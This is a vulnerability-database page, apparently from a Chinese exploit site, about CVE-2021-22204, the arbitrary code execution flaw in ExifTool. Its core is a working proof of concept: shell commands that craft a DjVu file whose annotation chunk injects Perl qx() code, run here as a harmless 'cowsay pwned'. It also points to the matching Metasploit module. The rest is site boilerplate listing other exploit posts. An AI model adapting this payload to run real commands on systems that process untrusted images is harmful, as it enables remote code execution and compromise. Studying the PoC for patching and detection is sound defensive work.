CVE-2021-22204_ExifTool任意代碼執行漏洞

# CVE-2021-22204 ExifTool任意代碼執行漏洞/pt

== Versão afetada ==
ExifTool 7.44 to 12.23

==POC==

  $ printf 'P1 1 1 0' > moo.pbm
   $ cjb2 moo.pbm moo.djvu
   $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
   $ exiftool moo.djvu > /dev/null
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

-- 
Jakub Wilk

==Metasploit==
https://github.com/rapid7/metasploit-framework/pull/15185

exploit/unix/fileformat/exiftool_djvu_ant_perl_injection

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

CVE-2021-22204_ExifTool任意代碼執行漏洞_pt

请登录后发表评论

1一些别人的CNVD报告

2外面流传的2024小迪99集残缺版

3湖南强智教务管理系统存在任意文件下载

4投稿：多个poc

5[投稿]Github红队测试工具收集

6数字化校园系统-RzptManage-文件上传

CVE-2021-22204_ExifTool任意代碼執行漏洞_pt

请登录后发表评论

1一些别人的CNVD报告

2外面流传的2024小迪99集残缺版

3湖南强智教务管理系统存在 任意文件下载

4投稿：多个poc

5[投稿]Github红队测试工具 收集

6数字化校园系统-RzptManage-文件上传

3湖南强智教务管理系统存在任意文件下载

5[投稿]Github红队测试工具收集